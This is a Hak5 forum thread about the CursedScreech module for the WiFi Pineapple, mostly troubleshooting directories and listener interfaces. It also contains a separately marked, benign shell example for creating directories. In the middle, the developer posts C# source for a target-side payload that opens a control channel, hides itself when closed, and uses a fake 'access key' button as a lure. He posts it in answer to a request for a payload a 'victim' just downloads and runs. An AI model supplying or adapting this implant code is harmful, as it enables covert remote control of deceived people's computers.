Hak5 Forums
sud0nick

[Official] CursedScreech


On 7/11/2018 at 6:11 PM, Ramez said:

I was finally able to find the solution! Apart from everything else I did above, you need to add the 'targetlogs' folder to the following directory: /pineapple/modules/CursedScreech/includes/forest

It looks like for some reason the new firmware updates have been causing issues where the 2 folders (keys & targetlogs) do not get created automatically. Anyway, hope this helps!

@Ramez thanks for finding this.  I just verified that the targetlogs directory doesn't get created as it should.  I'll work on a fix and push the update.  I'll also look into the keys directory in PortalAuth as I'm sure it's related to the same issue.

1 hour ago, sud0nick said:

@Ramez thanks for finding this.  I just verified that the targetlogs directory doesn't get created as it should.  I'll work on a fix and push the update.  I'll also look into the keys directory in PortalAuth as I'm sure it's related to the same issue.

I think that's my bad. I just realized that when we switched all modules from .tar.gz format to the git repository, empty directories would disappear.

They'll need to be created programmatically instead.

1 hour ago, Sebkinne said:

I think that's my bad. I just realized that when we switched all modules from .tar.gz format to the git repository, empty directories would disappear.

They'll need to be created programmatically instead.

Yeah, it's my fault for not checking for their existence in the first place.


You could also add a .gitkeep file to the directories as a placeholder so git doesn't remove them.

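The two fixes discussed above (creating the directories programmatically, or keeping a placeholder file in them), as an added example that is not part of the original thread or the module's own code. The function names and the temporary demo tree are hypothetical; only the directory names targetlogs and keys come from the posts.

```shell
#!/bin/sh
# Added example. Function names and the demo tree are hypothetical.

# Repo side: list empty directories, which git will not record
# (git tracks files only). Each one needs a placeholder such as .gitkeep.
list_empty_dirs() {
    find "$1" -type d -empty ! -path '*/.git/*' | sort
}

# Install/runtime side: create each ROOT/NAME that is missing.
# Prints "created NAME" per new directory; returns 1 on an unsafe path.
ensure_dirs() {
    root=$1; shift
    rc=0
    for name in "$@"; do
        dir="$root/$name"
        if [ -L "$dir" ]; then
            # A symlink could redirect logs or key material elsewhere.
            echo "refusing symlink: $dir" >&2; rc=1; continue
        fi
        if [ -e "$dir" ] && [ ! -d "$dir" ]; then
            echo "exists but is not a directory: $dir" >&2; rc=1; continue
        fi
        if [ ! -d "$dir" ]; then
            # umask in a subshell: the directory is owner-only from creation
            if (umask 077 && mkdir -p "$dir"); then
                echo "created $name"
            else
                rc=1
            fi
        fi
    done
    return $rc
}

# Demo on a constructed temporary tree (not the real module path).
demo=$(mktemp -d) && mkdir -p "$demo/includes/forest"
list_empty_dirs "$demo"
ensure_dirs "$demo/includes/forest" targetlogs keys
rm -rf "$demo"
```

Running ensure_dirs a second time prints nothing, so it is safe to call on every start.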

I really appreciate the payload you have provided with the cursedscreech module, but I was just wondering, are there any other payloads out there that don't involve having to put it in an access key? In other words, the victim just has to download the executable file and run it, instead of having to do the whole generate access key thing. I've looked everywhere but can't seem to find any pre-configured payloads for the pineapple.


@Ramez when you generate the payload in Visual Studio just don't include the PA_Authorization class.  Here's an example:

using System;
using System.Drawing;
using System.Windows.Forms;
using PineappleModules;

namespace Payload
{
    public partial class Form1 : Form {

        // ***************** REMOVE THIS LINE *****************
        PA_Authorization pauth = new PA_Authorization();
        // ***************** REMOVE THIS LINE *****************

        public Form1() {
            InitializeComponent();

            CursedScreech cs = new CursedScreech();
            cs.startMulticaster("231.253.78.29", 19578);
            cs.setRemoteCertificateSerial("EF-BE-AD-DE");
            cs.setRemoteCertificateHash("1234567890ABCDEF");
            cs.startSecureServerThread("Payload.Payload.pfx", "#$My$ecuR3P4ssw*rd&");
        }

        private void Form1_FormClosing(object sender, FormClosingEventArgs e) {
            e.Cancel = true;
            this.Hide();
        }

        // ***************** REMOVE THIS FUNCTION *****************

        private void accessKeyButton_Click(object sender, EventArgs e) {

            // Request an access key from the Pineapple
            string key = pauth.getAccessKey();

            // Check if a key was returned
            string msg;
            if (key.Length > 0) {
                msg = "Your access key is unique to you so DO NOT give it away!\n\nAccess Key: " + key;
            }
            else {
                msg = "Failed to retrieve an access key from the server.  Please try again later.";
            }

            // Display message to the user
            MessageBox.Show(msg);
        }

        // ***************** REMOVE THIS FUNCTION *****************
    }
}

The authorization function is just a trick anyway.  There's no real dependency on the access key for Cursed Screech.  However, the Payloader injection set in Portal Auth does require the access key to allow a target through Evil Portal.  Maybe in the future I'll add a Payloader injection set that doesn't require the access key but for now you'll have to remove that functionality yourself.


First of all, thank you for the amazing support you have been giving. I do have a quick question. My target downloads and runs the payload fine, but although it shows up in the serverlog, Sein can't seem to make a connection. It never turns up in the target list in CursedScreech. Does anyone have any ideas why??

11 hours ago, display-names said:

First of all, thank you for the amazing support you have been giving. I do have a quick question. My target downloads and runs the payload fine, but although it shows up in the serverlog, Sein can't seem to make a connection. It never turns up in the target list in CursedScreech. Does anyone have any ideas why??

How is your target connected to the Pineapple?  There's an interface setting in the Settings pane that lets you select which interface Sein should listen on.  Make sure it's listening on the one that's connected to the same network as your target.

11 hours ago, sud0nick said:

How is your target connected to the Pineapple?  There's an interface setting in the Settings pane that lets you select which interface Sein should listen on.  Make sure it's listening on the one that's connected to the same network as your target.

Sein is listening on the br-lan interface, the target is connected through the open PineAP AP. Does that make sense?

16 hours ago, display-names said:

Sein is listening on the br-lan interface, the target is connected through the open PineAP AP. Does that make sense?

The PineAP interface is wlan1.  Not sure if you should see it on br-lan or not but try switching Sein to wlan1 and see if it works.

7 hours ago, sud0nick said:

The PineAP interface is wlan1.  Not sure if you should see it on br-lan or not but try switching Sein to wlan1 and see if it works.

Well, I only have the option to set it to br-lan; I do have the most up-to-date version though. I will just try to reinstall the module, I guess. But just in case, any ideas why I can't set my Sein interface to anything except br-lan?

EDIT 1: reinstall didn't help, too bad


Never mind, wlan1 isn't available because by default it doesn't have an IP address.  The only interfaces that appear in that dropdown are those that have an IP.  br-lan should definitely be working.  I'll look into it.

On 8/9/2018 at 2:58 AM, sud0nick said:

Never mind, wlan1 isn't available because by default it doesn't have an IP address.  The only interfaces that appear in that dropdown are those that have an IP.  br-lan should definitely be working.  I'll look into it.

Hey there, I have tried to get it to work, but no luck. Did you have any more luck? :)
